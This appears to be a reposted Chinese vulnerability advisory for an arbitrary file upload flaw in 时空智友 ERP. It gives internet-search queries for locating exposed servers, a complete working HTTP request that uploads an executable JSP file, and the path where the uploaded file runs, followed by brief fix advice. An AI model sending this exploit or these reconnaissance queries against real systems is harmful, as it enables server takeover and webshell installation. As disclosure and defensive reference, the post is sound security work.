漏洞描述
时空智友 ERP uploadstudiofile 文件 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 WebShell,控制服务器权限,执行任意命令等
网络空间测绘
Fofa
body="login.jsp?login=null"
Hunter
web.body="login.jsp?login=null"
Quake
body="login.jsp?login=null"
漏洞复现
POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/30.0.1599.101Safari/537.36
Content-Length:437
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
content=%3c%3fxml%20version%3d%221.0%22%3f%3e%3croot%3e%3cfilename%3etest.jsp%3c%2ffilename%3e%3cfilepath%3e.%2f%3c%2ffilepath%3e%3cfilesize%3e172%3c%2ffilesize%3e%3clmtime%3e1970-01-01%2008%3a00%3a00%3c%2flmtime%3e%3c%2froot%3e%3c!--%3c%25%20out.print(%22%3cpre%3e%22)%3bout.println(111%20*%20112)%3bout.print(%22%3c%2fpre%3e%22)%3bnew%20java.io.File(application.getRealPath(request.getServletPath())).delete()%3b%0d%0a%25%3e%0d%0a--%3e
访问链接
/update/temp/studio/test.jsp
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】时空智友 ERP uploadstudiofile 文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论